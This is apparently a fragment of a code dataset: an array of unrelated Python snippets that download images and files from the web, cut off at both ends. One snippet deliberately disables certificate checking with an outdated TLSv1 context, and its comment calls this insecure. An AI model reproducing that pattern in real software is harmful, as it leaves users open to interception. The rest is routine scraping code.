drpver=self._drpver, plate=plate)", "def help_download_file():\n global picture_lst\n picture_lst = [\"test/download1.png\", \"test/download2.png\", \"test/download3.png\", \"test/download4.png\",\n \"test/download5.png\", \"test/download6.png\", \"test/download7.png\", \"test/download8.png\",\n \"test/download9.png\", \"test/download10.png\", \"test/download11.png\", \"test/download12.png\",\n \"test/download13.png\"]\n help_main()", "def download_files(self):", "def get_image_url(pixid, imgInfoPool, multiAutocheck=0, timeout=10):\n\n # open the page\n try:\n r = requests.get(operate_url, params=dict(mode='medium', illust_id=pixid), cookies=mycookies)\n except ConnectionError:\n print('I cannot open the page. Maybe the id is invalid?')\n return 1\n\n soup = bs4.BeautifulSoup(r.text.encode('utf-8'), 'html.parser')\n img = soup.find('img', class_='original-image')\n if not img: # multiple images, or error\n if multiAutocheck == 2: # silence\n return None\n\n try:\n r = requests.get(operate_url, params=dict(mode='manga', illust_id=pixid), cookies=mycookies)\n except ConnectionError: # it's error\n print('I cannot open the page. Maybe the id is invalid?')\n return 1\n else: # it's multiple images\n soup = bs4.BeautifulSoup(r.text.encode('utf-8'), 'html.parser')\n imgNumber = len(soup.find_all('div', class_='item-container'))\n if imgNumber == 0:\n print('Cannot find pictures in the page. Please try again?')\n print('Url is ' + r.url)\n return 1\n\n if multiAutocheck == 1:\n imgIndex = 'a'\n elif multiAutocheck == 0:\n imgIndex = input('Illustration ' + str(pixid) + ' has ' + str(\n imgNumber) + ' pictures. Download all (a) or index: (number)')\n\n if imgIndex == 'a':\n for i in range(0, imgNumber):\n result2 = get_image_url2(pixid, i, imgInfoPool)\n if result2:\n return result2\n else:\n result2 = get_image_url2(pixid, int(imgIndex), imgInfoPool)\n if result2:\n return result2\n\n else: # one image\n imgName = img.attrs.get('alt')\n imgInfoPool.append(dict(id=pixid, name=imgName, url=img.attrs.get('data-src'), pageurl=r.url))\n return", "def download_single(data):\n url = data[0]\n image_id = data[1]\n target_path = data[2]\n\n if os.path.exists(target_path):\n return\n\n try:\n response = requests.get(url, timeout=30)\n response.raise_for_status()\n except:\n LOGGER.warning('Failed to fetch url %s (id=%d)', url, image_id)\n return\n\n try:\n content = response.content\n image = Image.open(BytesIO(content))\n except:\n LOGGER.warning('Failed to capture image at url %s (id=%d)', url, image_id)\n return\n\n if not image.format == 'JPEG':\n try:\n image = image.convert('RGB')\n except:\n logging.warning('Failed to convert RGB, %s (id=%d)', url, image_id)\n return\n\n try:\n image.save(target_path, format='JPEG', quality=100)\n except:\n LOGGER.warning('Failed to save url %s (id=%d)', url, image_id)\n return\n\n return", "def get_images(outputdir, parent_key, key, searchurl, maximum, json_path):\n body, browser = build_browser(searchurl)\n\n urls = []\n\n while len(urls) < maximum:\n try:\n page_source = browser.page_source\n\n soup = BeautifulSoup(page_source, 'lxml')\n\n search_result_soup = get_div_child(soup.body, \"islrg\")\n images = search_result_soup.find_all('img')\n urls = get_url_from_images(images)\n print(urls)\n\n for i in range(50):\n scroll_down(body)\n # browser.find_element_by_xpath('//*[@id=\"islmp\"]/div/div/div/div')\n browser.find_element_by_class_name(\"mye4qd\").click()\n print(len(urls) < maximum)\n except ElementNotInteractableException as e: # There is no next page\n print(e)\n break\n\n\n\n if not os.path.exists(outputdir):\n os.makedirs(outputdir)\n\n write_urls(json_path, parent_key, key, urls)\n\n # download_urls(urls, outputdir)\n browser.close()", "def download_pictures(recent_seach_tweets):\n # Downloading pictures\n print('%s - Downloading %d tweets' % (datetime.datetime.now().strftime('%d/%m/%Y - %H:%M'), len(recent_seach_tweets)))\n for tw in recent_seach_tweets:\n img_url = tw['images'][0]\n filename = tw['text'][:tw['text'].index(\"#\")-1].lower().replace(' ','_')\n filename = \"./downloaded_pics/%s.jpg\" % filename\n urllib.request.urlretrieve(img_url, filename)", "def get_image_qm(html_src, todir):\n #print url\n\n img_url, title = img_details(html_src)\n \n r = requests.get(img_url)\n with open(todir+title+'.jpg','wb') as f:\n f.write(r.content)", "def get_images(self, page_number):", "def get_image(url, path):\n r = requests.get(url, stream=True)\n if r.status_code == 200:\n with open(path, 'wb') as f:\n r.raw.decode_content = True\n shutil.copyfileobj(r.raw, f)\n print(\"[>] get\", url, \">>\", path)\n f.close()", "def download_images_from_metadatas(metadatas):\n ptf_images = []\n for metadata in metadatas:\n url = os.path.join(IPAC_DATA_URL, metadata[\"pfilename\"])\n ptf_images.append(PTFImage(retrieve_ipac_file(url), metadata=metadata))\n print greenText(\"Image {} downloaded.\".format(os.path.basename(metadata[\"pfilename\"])))\n \n return ptf_images", "def download_images(img_urls, dest_dir):\n if not os.path.exists(dest_dir):\n # If the directory doesn't exist, create it\n os.mkdir(dest_dir)\n count = 0\n img_string = ''\n # Copies each file from the url provided to the directory provided\n for file in img_urls:\n new_filename = '{}/img{}.jpg'.format(dest_dir, count)\n print \"Retrieving {}\".format(file)\n urllib.urlretrieve(file, new_filename)\n img_string += \"<img src = 'img{}.jpg'>\".format(count)\n count += 1\n print \"Retrieved {} files\".format(count)\n # Creates an html file to display the completed image\n with open('{}/index.html'.format(dest_dir), 'w') as f:\n f.write(\n '<html>\\n<body>\\n{}\\n</body>\\n</html>'.format(img_string)\n )\n pass", "def read_from_server(url_base=\"http://10.200.102.18/\", url_dir=\"G179-dataset/\"):\n\n all_images = urllib2.urlopen(url_base + url_dir).read()\n\n parser = ImagesHTMLParser()\n parser.feed(all_images)\n data = parser.data\n imgs = []\n\n print(\"Found %d images!\" % len(data))\n print(\"Started Download!\")\n i = 1\n\n for d in data:\n print(\"\\rProgress: %d/%d \" % (i, len(data)), end='')\n dl_img = urllib2.urlopen(url_base + url_dir + d).read()\n asd = cStringIO.StringIO(dl_img)\n img = Image.open(asd)\n imgs.append(np.array(img))\n i = i + 1\n\n return imgs", "def download_image_from(link, directory, name):\n try:\n img_content = requests.get(link).content\n image_file = io.BytesIO(img_content)\n image = Image.open(image_file).convert('RGB')\n image.save(f'./{directory}/{name}.png', 'PNG', quality=100, subsampling=0)\n except:\n pass", "def download_images(img_urls, dest_dir):\n # Creating the directory if the directory does not already exist\n if not os.path.exists(str(dest_dir)):\n os.mkdir(dest_dir)\n print ('Retrieving...')\n with open(str(dest_dir) + '/index.html', 'w') as f:\n f.write(\"<html>\\n<body>\\n\")\n for index, url in enumerate(img_urls):\n img_name = 'img' + str(index + 1)\n urllib.urlretrieve(\"https://code.google.com\" + url, filename=str(dest_dir) + '/'\n + img_name +'.jpg')\n print ('Downloaded ' + url[-10:] + \": \" + \\\n str(index + 1) + \" images downloaded\")\n\n f.write(\"<img src=\" + '\"' + img_name +\".jpg\" +'\">')\n f.write(\"\\n</html>\\n</body>\")\n print ('Download Complete!')\n pass", "def dl_image(img_name, img_url):\n path = os.path.join(base_path, img_name)\n res = requests.get(img_url)\n with open(path, 'wb') as fout:\n fout.write(res.content)", "def auto_download(dataDir, dataType, dataYear):\n\n # Setup paths and file names\n if dataType == \"minival\" or dataType == \"valminusminival\":\n imgDir = \"{}/{}{}\".format(dataDir, \"val\", dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, \"val\", dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(\"val\", dataYear)\n else:\n imgDir = \"{}/{}{}\".format(dataDir, dataType, dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, dataType, dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(dataType, dataYear)\n # print(\"Image paths:\"); print(imgDir); print(imgZipFile); print(imgURL)\n\n # Create main folder if it doesn't exist yet\n if not os.path.exists(dataDir):\n os.makedirs(dataDir)\n\n # Download images if not available locally\n if not os.path.exists(imgDir):\n os.makedirs(imgDir)\n print(\"Downloading images to \" + imgZipFile + \" ...\")\n with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + imgZipFile)\n with zipfile.ZipFile(imgZipFile, \"r\") as zip_ref:\n zip_ref.extractall(dataDir)\n print(\"... done unzipping\")\n print(\"Will use images in \" + imgDir)\n\n # Setup annotations data paths\n annDir = \"{}/annotations\".format(dataDir)\n if dataType == \"minival\":\n annZipFile = \"{}/instances_minival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_minival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0\"\n unZipDir = annDir\n elif dataType == \"valminusminival\":\n annZipFile = \"{}/instances_valminusminival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_valminusminival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0\"\n unZipDir = annDir\n else:\n annZipFile = \"{}/annotations_trainval{}.zip\".format(dataDir, dataYear)\n annFile = \"{}/instances_{}{}.json\".format(annDir, dataType, dataYear)\n annURL = \"http://images.cocodataset.org/annotations/annotations_trainval{}.zip\".format(dataYear)\n unZipDir = dataDir\n # print(\"Annotations paths:\"); print(annDir); print(annFile); print(annZipFile); print(annURL)\n\n # Download annotations if not available locally\n if not os.path.exists(annDir):\n os.makedirs(annDir)\n if not os.path.exists(annFile):\n if not os.path.exists(annZipFile):\n print(\"Downloading zipped annotations to \" + annZipFile + \" ...\")\n with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + annZipFile)\n with zipfile.ZipFile(annZipFile, \"r\") as zip_ref:\n zip_ref.extractall(unZipDir)\n print(\"... done unzipping\")\n print(\"Will use annotations in \" + annFile)", "def download_rna_seq(rna_seq_uuid_list, dirpath):\n data_dict = {}\n data_dict[\"ids\"] = rna_seq_uuid_list\n\n headers = {'Content-Type': 'application/json'}\n data = json.dumps(data_dict)\n\n try:\n response = requests.post('https://api.gdc.cancer.gov/data', headers=headers, data=data)\n filename = os.path.join(dirpath,response.headers[\"Content-Disposition\"].split(\"filename=\")[1])\n\n with open(filename, \"wb\") as file:\n file.write(response.content)\n file.close()\n return filename\n except:\n return None", "def download_img_and_save(url, path):\n import requests\n a = url.find(\"UW-EauClaireCOVID-19DataTrackerDashboard\")\n b = len(url)\n fn = url[a:b].replace('/','_')\n fn = '{}/{}'.format(path,fn)\n with open(fn, \"wb\") as f:\n f.write(requests.get(url).content)", "async def get_url_images(session, url):\n content = await get_page(session, url)\n if not content:\n return []\n soup = BeautifulSoup(content, features=\"html.parser\")\n image_sources = [img['src'] for img in soup.find_all('img')]\n image_sources_fixed = [f'https:{source}' if 'https:' not in source else source for source in image_sources]\n images = []\n for source in image_sources_fixed:\n image = await get_image(session, source)\n if image:\n images.append((source, image))\n\n return images", "def create_image_urls(self):\n self._image_urls = []\n while True:\n image_url = self._create_random_url()\n request = urllib2.Request(image_url)\n opener = urllib2.build_opener(NoRedirection)\n try:\n response = opener.open(request)\n code = response.code\n except urllib2.HTTPError as error:\n code = error.code\n if code == 200:\n print \"Found a successful url!\"\n self._image_urls.append(image_url)\n if len(self._image_urls) > 100:\n break\n print self._image_urls\n image_url_file = open(self._image_urls_file_name, 'w')\n for image_url in self._image_urls:\n image_url_file.write(image_url + '\\n')\n image_url_file.close()", "def getNextImage(self):\n self._images = self._api.updateImageNames()\n \n # Get index from local txt file. \n # This ensures that the image queue does not reset if the Pola restarts.\n try: \n f = open(\"memoryIndex.txt\", 'r')\n self._currentIndex = int((f.read()))\n f.close()\n except: \n self._currentIndex = -1\n \n self._currentIndex = (self._currentIndex + 1) % len(self._images)\n \n f = open(\"memoryIndex.txt\", 'w')\n f.write(str(self._currentIndex))\n f.close()\n \n \n # If there is an internet connection, go online. If not, get the \"no wifi error\"- image queue\n try:\n urllib.request.urlopen('http://torabodin.com/')\n try: \n imageName = self._api.downloadImage(self._currentIndex)\n print(1, imageName)\n self._image= self.loadImage(imageName, True)\n print (self._image)\n \n except: \n self._image = self.getNextImage()\n \n except:\n self._image = self.loadImage(None, False)\n \n \n return self._image", "def download(self):\n\n # os.open *should* give a thread-safe way to exlusivly open files\n filepath = self.film\n try:\n # os.O_BINARY is only avilable and needed on windows\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY | os.O_BINARY\n except:\n flags = os.O_CREAT | os.O_EXCL | os.O_WRONLY\n try:\n fd = os.open(filepath, flags)\n except:\n return\n\n try:\n response = self.session.get(self.filmurl, stream=True)\n if response.status_code == 200:\n for chunk in response.iter_content(1024):\n os.write(fd, chunk)\n except:\n # Remove partial img file if request or stream fails\n os.close(fd)\n os.remove(filepath)", "def download_content(content_link, output_dir):\n if content_link is None: return None\n res = requests.get(content_link, stream=True)\n try:\n res.raise_for_status()\n except requests.exceptions.HTTPError:\n return None\n img_name, img_format = parse_image_url(res.url)\n filepath = '{}/{}.{}'.format(output_dir, img_name, img_format)\n\n with open(filepath, mode='wb') as image_file:\n for chunk in res.iter_content(chunk_size=chunk_size):\n image_file.write(chunk)\n\n return abspath(filepath)", "def download_image(url, filename):\n r = requests.get(url)\n open(filename, 'wb').write(r.content)", "def download_images(img_urls, dest_dir):\n if len(img_urls) > 0 :\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n # save each images file name\n image_names = []\n # Iterate over each image url, downloading the image to a local file\n img_ctr = 0\n for url in img_urls :\n file_name = 'img' + str(img_ctr) + '.jpg'\n image_names.append(file_name)\n full_name = dest_dir + '/' + file_name\n print('Writing file: %s from %s' % (full_name, url) )\n # When calling the SSLContext constructor directly, CERT_NONE is the default.\n # Since it does not authenticate the other peer it can be insecure\n # Beyond the scope of this exercise (emoji holding my nose)\n unsecure_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n with urllib.request.urlopen(url, context=unsecure_context) as response, open(full_name, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n img_ctr += 1\n return image_names", "def my_download_pic(name, url, date_epoch, outputlabel=None, quiet=False):\n if outputlabel is None:\n outputlabel = instaloader._epoch_to_string(date_epoch)\n urlmatch = re.search('\\\\.[a-z]*\\\\?', url)\n file_extension = url[-3:] if urlmatch is None else urlmatch.group(0)[1:-1]\n filename = name.lower() + '/' + instaloader._epoch_to_string(date_epoch) + '.' + file_extension\n if os.path.isfile(filename):\n instaloader._log(outputlabel + ' exists.', flush=True, quiet=quiet)\n raise PicAlreadyDownloadedException(\"File \\'\" + filename + \"\\' already exists.\")\n resp = instaloader.get_anonymous_session().get(url, stream=True)\n if resp.status_code == 200:\n instaloader._log(outputlabel + ' uploaded.', flush=True, quiet=quiet)\n os.makedirs(name.lower(), exist_ok=True)\n with open(filename, 'wb') as file:\n resp.raw.decode_content = True\n shutil.copyfileobj(resp.raw, file)\n os.utime(filename, (datetime.datetime.now().timestamp(), date_epoch))\n return filename\n else:\n raise instaloader.ConnectionException(\"File \\'\" + url + \"\\' could not be downloaded.\")", "def _download_images(self, url_file, destination_dir, log_file):\n logger = self.setup_log(log_file)\n logger.info(config.LOG_INITIAL_MESSAGE % (url_file, destination_dir))\n\n with open(url_file) as urls:\n for i, l in enumerate(urls):\n pass\n bar = progressbar.ProgressBar(i + 1)\n\n download_count = 0\n\n # opening the url file and reading the urls\n with open(url_file, 'r') as urls:\n for i, url in enumerate(urls):\n bar.set(i)\n\n url = url.strip()\n components = urllib.parse.urlparse(url)\n if not (components.scheme and components.netloc and components.path):\n logger.error('%s: \"%s\"' % (config.LOG_URL_INVALID, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # check whether the robots.txt allows us to crawl this URL\n try:\n can_fetch = self.download_allowed(url, components.scheme, components.netloc)\n except (AttributeError, urllib.error.URLError, ValueError):\n logger.error('%s: %s' % (config.LOG_ERROR_ROBOTS, self.truncate_middle(url, config.MAX_URL)))\n continue\n\n # log that image download is disallowed\n if not can_fetch:\n logger.error('%s: %s' % (config.LOG_DISALLOWED, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # open image url\n try:\n url_response = urllib.request.urlopen(url)\n except urllib.error.URLError as error:\n logger.error('%s: %s' % (config.LOG_ERROR_OPENING, self.truncate_middle(url, config.MAX_URL)))\n continue\n\n # check whether the URL content is an image \n if url_response.info().get_content_maintype().lower() != config.IMAGE_MIMETYPE:\n logger.error('%s: %s' % (config.LOG_NOT_AN_IMAGE, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # retrieve the content and store in the destination directory\n os.makedirs(destination_dir, exist_ok=True) \n image_name = '%s_%s' % (download_count + 1, os.path.basename(url))\n with open(os.path.join(destination_dir, image_name), 'wb') as image_file:\n try:\n image_file.write(url_response.read())\n except urllib.error.URLError as error:\n logger.error('%s: %s' % (config.LOG_ERROR_DOWNLOADING, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # log download and increment the counter\n logger.info('%s %s, url: %s' % (config.LOG_DOWNLOADED, self.truncate_middle(image_name, config.MAX_FILE_NAME), self.truncate_middle(url, config.MAX_URL)))\n download_count += 1\n\n # set the progress bar to 100 percent and print a comment and new line for the returning prompt\n bar.complete('completed')\n\n # release the logger handles\n self.shutdown_log(logger)", "async def download_all_images(main_page):\n all_relevant_pages = [f'https://{main_page}']\n async with aiohttp.ClientSession() as session:\n subpages = await get_all_relevant_subpages(session, main_page)\n all_relevant_pages.extend(subpages)\n\n await scrape_pages(session, all_relevant_pages)\n\n logging.info('Images from main page %s and its sub pages were download', main_page)", "def get_images(eol_id):\n page = 1\n while True:\n details_url = f\"https://eol.org/api/pages/1.0/{eol_id}.json\"\n payload = {\"id\": eol_id, \n \"images_per_page\": 75,\n \"images_page\": page,\n }\n r = requests.get(details_url, params=payload)\n\n response = json.loads(r.text)\n content = response[\"taxonConcept\"]\n if not \"dataObjects\" in content:\n return\n\n for item in content[\"dataObjects\"]:\n yield item[\"mediaURL\"]\n page += 1", "def getData(constrain):\n\n dat_AGS = chunks(AGS, 100)\n for num, ags_c in enumerate(dat_AGS):\n to_download = DOWNLOAD_LINK.format(ags_id=ags_c, constrain=constrain)\n to_download = to_download.replace(\" \", \"\")\n download_name = \"../Data/Gemeinden/{}-{}.csv\".format(\n constrain, num)\n\n url.urlretrieve(to_download, filename=download_name)\n\n sleep(1) # be nice\n\n return(num)", "def get_tile(url):\n hash_name = hashlib.md5(url.encode(\"utf-16\")).hexdigest()\n fname = hash_name + \".jpeg\"\n print(\"Checking tile\" + fname)\n #if image is already downloaded, return it\n if os.path.isfile(fname):\n print(\"Downloaded!\")\n try:\n # image was fully downloaded, good to return\n return Image.open(fname) \n except Exception:\n print(\"Tile is corrupt :(\")\n # file is corrupted for some reason, so try to download it\n pass\n print(\"Downloading \" + fname)\n req.urlretrieve(url, fname) \n return Image.open(fname)", "def download_image(img_src, to_filename):\n res = requests.get(urljoin(BASE_URL, img_src), stream=True)\n with open(to_filename, \"wb\") as f:\n for chunk in res:\n f.write(chunk)", "def extract_image(page_html, family_url, folder):\n image_extractor = Extractor(page_html, family_url)\n for url in image_extractor.get_image_table():\n image_page_url = urljoin(family_url, url)\n # print(image_page_url)\n imres = requests.get(image_page_url)\n image_page_extractor = Extractor(imres.text, image_page_url)\n image_src, image_name = image_page_extractor.get_image_link()\n\n image_link = urljoin(image_page_url, image_src)\n\n print(image_link, image_name)\n # Download image\n fetch(image_link, image_name, folder)", "def fetch(self, page, part):\n\n file = '/page-' + str(page)\n if part > 1:\n file += '.' + str(part)\n file += '.png'\n\n source = self.baseUrl + file\n destination = self.download\n\n no_problem_unlink(destination + '-small')\n no_problem_unlink(destination)\n\n image = http_get(source)\n if image.find('Not Found') == -1 and len(image) > 0:\n f = open(destination + '-small', 'w')\n f.write(image)\n f.close()\n\n if os.path.exists(destination + '-small') and os.path.getsize(destination + '-small') > 0:\n width = self.ORIGINAL_WIDTH * self.RESIZE_FACTOR\n height = self.ORIGINAL_HEIGHT * self.RESIZE_FACTOR\n resize_png(width, height, destination + '-small', destination)\n return destination\n else:\n return self.default", "def download_images(img_urls, dest_dir, base_url=\"http://code.google.com\"):\n create_dir(dest_dir)\n img_tags = fetch_call(img_urls, dest_dir)\n create_html(dest_dir, img_tags)", "def __urlImageGenerator(cls, link):\n\n try:\n a = Article(url=link)\n a.download()\n a.parse()\n a.fetch_images()\n\n for img in a.imgs:\n yield img\n except Exception:\n pass", "def get_image():\n\n url = 'http://skyview.gsfc.nasa.gov/cgi-bin/images'\n params = dict(Position='%s,%s' % (source['ra'], source['dec']),\n Survey=source['survey'].val,\n Return='GIF')\n response = requests.get(url, params=params, stream=True)\n with open(files['image.gif'].rel, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)", "def GET(self, url):\n try:\n f = open(url, 'r')\n image = f.read()\n f.close()\n except:\n\n db_module.resave_img(url[5:])\n\n f = open(url, 'r')\n image = f.read()\n f.close()\n\n return image", "def test_z_download_images(self):\n #img_urls = logpuzzle.read_urls('place_code.google.com')\n img_urls = logpuzzle.read_urls('animal_code.google.com')\n dest_dir = './puzzle_images'\n logpuzzle.download_images(img_urls, dest_dir)\n\n result = os.listdir(dest_dir)\n expected_result = ['img0.jpg', 'img1.jpg', 'img10.jpg', 'img11.jpg', 'img12.jpg', 'img13.jpg', 'img14.jpg', 'img15.jpg', 'img16.jpg', 'img17.jpg', 'img18.jpg', 'img19.jpg', 'img2.jpg', 'img3.jpg', 'img4.jpg', 'img5.jpg', 'img6.jpg', 'img7.jpg', 'img8.jpg', 'img9.jpg']\n self.assertEqual(expected_result, result,\n 'write_index_file() expected {} but got {}'.format(expected_result, result))", "def save_image(self, url_and_filename: List[str]) -> None:\n\n res_jpg = requests.get(url_and_filename[0])\n res_jpg.raise_for_status()\n os.makedirs(os.path.join(THIS_DIR, 'comics'), exist_ok=True)\n open(os.path.join(THIS_DIR, f'comics/{url_and_filename[1]}'), \"wb\").write(res_jpg.content)", "def download():\n \"\"\"\n \"The book p.79 have error.\n \"https://github.com/login/oauth/authorize?client_id=7e0a3cd836d3e544dbd9&redirect_uri=https%3A%2F%2Fgist.github.com%2Fauth%2Fgithub%2Fcallback%3Freturn_to%3Dhttps%253A%252F%252Fgist.github.com%252Fyoungsoul%252Ffc69665c5d08e189c57c0db0e93017a6&response_type=code&state=9b385430ee7cd1a75ca91c1d1cb6c565111f6b81e54a71f42ae9b22035241b9b\n \"\"\"\n subprocess.call([\n 'wget',\n 'https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat', \n '-P',\n 'origin_data/'\n ])\n logger.info('Download success!')", "def download_image(year, month, day, hour, minute):\n\n image_address = f\"https://www.berner-storch.ch/webcam/upload/cam01/{year}/{str(month).zfill(2)}/{str(day).zfill(2)}/{str(hour).zfill(2)}/cam-{str(minute).zfill(2)}.jpg\"\n\n # this will be the filename \"YYYY-MM-DD_HH-MM\"\n date = f\"{year}-{str(month).zfill(2)}-{str(day).zfill(2)}_{str(hour).zfill(2)}-{str(minute).zfill(2)}\"\n\n try:\n urllib.request.urlretrieve(image_address, f\"../images/{year}/{date}.jpg\")\n except:\n print(f\"image under the link {image_address} can't be retrieved\")", "def download_image(save_dir, imgInfoPool, timeout=10, replaceExist=False):\n os.chdir(save_dir)\n\n cnt = 0\n for imgInfo in imgInfoPool:\n filename = str(imgInfo['id']) + '.' + imgInfo['url'].split('.')[-1]\n if not replaceExist and os.path.exists(filename):\n print('Skip exist image ' + filename)\n continue\n else:\n print('Downloading...' + str(cnt) + '/' + str(len(imgInfoPool)), end='\\r')\n\n try:\n r = requests.get(imgInfo['url'], headers={'Referer': imgInfo['pageurl']}, timeout=timeout)\n except ConnectionError:\n print('I cannot download the page...')\n print('url: ', imgInfo['url'])\n except TimeoutError:\n print('Network timeout. Please try again.')\n print('url: ', imgInfo['url'])\n else:\n try:\n with open(filename, 'wb') as f:\n f.write(r.content)\n except IOError:\n print('Cannot write picture ' + imgInfo['id'])\n return 1\n cnt += 1", "def download_images(self, url_file, destination_dir, log_file):\n try:\n self._download_images(url_file, destination_dir, log_file)\n except IOError as error:\n sys.stderr.write(str(error))\n sys.exit(error.errno)\n except Exception as error:\n sys.stderr.write('[Unknown error] %s' % str(error))\n sys.exit(1)", "def download_many(archivos:[(\"url\",\"nombre\")], carpeta:str=PATH, *, ignore_error:bool=True, _gui:bool=False, **tqdm_karg):", "def download_image(wnid, query):\r\n images = urllib2.urlopen(image_url+wnid)\r\n images_list = [image.split() for image in images]\r\n random.shuffle(images_list)\r\n \r\n## urllib.urlretrieve(bbox_url+wnid+\".tar.gz\",wnid+\".tar.gz\")\r\n print(bbox_url+wnid)\r\n## urllib.urlretrieve(bbox_url+wnid,wnid+\".tar.gz\")\r\n retrieve(bbox_url+wnid+\".tar.gz\", wnid+\".tar.gz\")\r\n bb_files = tarfile.open(wnid+\".tar.gz\", \"r:gz\")\r\n names = bb_files.getnames()\r\n \r\n names = \"\".join(names)\r\n ids = re.findall(pattern, names)\r\n used_id = None\r\n \r\n for image in images_list:\r\n if re.findall(pattern,image[0])[0] in ids:\r\n try:\r\n url = urllib2.urlopen(image[1]).geturl()\r\n if url == image[1]:\r\n used_id = image[0]+\".xml\"\r\n## urllib.urlretrieve(url,\"usable\"+query+\".jpg\")\r\n retrieve(url, \"usable\"+query+\".jpg\")\r\n break\r\n except:\r\n continue\r\n \r\n for member in bb_files:\r\n if used_id in member.name:\r\n bbox = bb_files.extractfile(member)\r\n bbox_file = open(\"usable\"+query+\".xml\",\"w\")\r\n bbox_file.write(bbox.read())\r\n bbox_file.close()\r\n break\r\n \r\n bb_files.close()", "def main():\n try:\n pixid = sys.argv[1]\n except IndexError:\n print('Usage: python pixget.py [pixid] (save_path)')\n exit(1)\n\n # get the path\n if len(sys.argv) > 2:\n path = sys.argv[2]\n else:\n path = '.'\n\n imgInfoPool = []\n if get_image_url(pixid, imgInfoPool):\n exit(1)\n download_image(path, imgInfoPool)", "def download_image(image_url, image_name, collection_id):\n try:\n response = requests.get(image_url)\n folder_path = imgs_directory + '/' + collection_id\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n image_path = folder_path + '/' + image_name\n # image_path = os.path.join(folder_path, image_name)\n with open(image_path, 'wb') as f:\n f.write(response.content)\n return image_path\n except Exception as e:\n print(f\"An error occurred while downloading image {image_name}. Error message: {e}\")\n return None", "def download_picture(inPath):\n success = False\n consoleFeedback = exec_console_command(constants.copyFileToStatic.format(inPath))\n print(consoleFeedback)\n\n if \"SUCCESS\" in consoleFeedback:\n success = True\n else:\n raise IOError(constants.pictureNotFound)\n\n return success", "def image_fetcher(year, month, day, name):\n entry = 'data/{year}/{month}/{day}/{name}'.format(year=year, month=month, day=day, type=type, name=name)\n img = open(entry)\n return send_file(img)", "def download_image(filename):\n return ImageApiHandler.image_handler.get(filename)", "def download_image(self, url):\r\n file_path = os.path.join(self.temp_dir, 'image.png')\r\n urlretrieve(url, file_path)\r\n return file_path", "def get_image_url():", "def auto_download(self, dataDir, dataType, dataYear):\n\n # Setup paths and file names\n if dataType == \"minival\" or dataType == \"valminusminival\":\n imgDir = \"{}/{}{}\".format(dataDir, \"val\", dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, \"val\", dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(\"val\", dataYear)\n else:\n imgDir = \"{}/{}{}\".format(dataDir, dataType, dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, dataType, dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(dataType, dataYear)\n # print(\"Image paths:\"); print(imgDir); print(imgZipFile); print(imgURL)\n\n # Create main folder if it doesn't exist yet\n if not os.path.exists(dataDir):\n os.makedirs(dataDir)\n\n # Download images if not available locally\n if not os.path.exists(imgDir):\n os.makedirs(imgDir)\n print(\"Downloading images to \" + imgZipFile + \" ...\")\n with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + imgZipFile)\n with zipfile.ZipFile(imgZipFile, \"r\") as zip_ref:\n zip_ref.extractall(dataDir)\n print(\"... done unzipping\")\n print(\"Will use images in \" + imgDir)\n\n # Setup annotations data paths\n annDir = \"{}/annotations\".format(dataDir)\n if dataType == \"minival\":\n annZipFile = \"{}/instances_minival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_minival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0\"\n unZipDir = annDir\n elif dataType == \"valminusminival\":\n annZipFile = \"{}/instances_valminusminival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_valminusminival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0\"\n unZipDir = annDir\n else:\n annZipFile = \"{}/annotations_trainval{}.zip\".format(dataDir, dataYear)\n annFile = \"{}/instances_{}{}.json\".format(annDir, dataType, dataYear)\n annURL = \"http://images.cocodataset.org/annotations/annotations_trainval{}.zip\".format(dataYear)\n unZipDir = dataDir\n # print(\"Annotations paths:\"); print(annDir); print(annFile); print(annZipFile); print(annURL)\n\n # Download annotations if not available locally\n if not os.path.exists(annDir):\n os.makedirs(annDir)\n if not os.path.exists(annFile):\n if not os.path.exists(annZipFile):\n print(\"Downloading zipped annotations to \" + annZipFile + \" ...\")\n with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + annZipFile)\n with zipfile.ZipFile(annZipFile, \"r\") as zip_ref:\n zip_ref.extractall(unZipDir)\n print(\"... done unzipping\")\n print(\"Will use annotations in \" + annFile)", "def download(correlation_id, image_url, output_path=None):\n try:\n response = requests.get(image_url, timeout=15)\n if 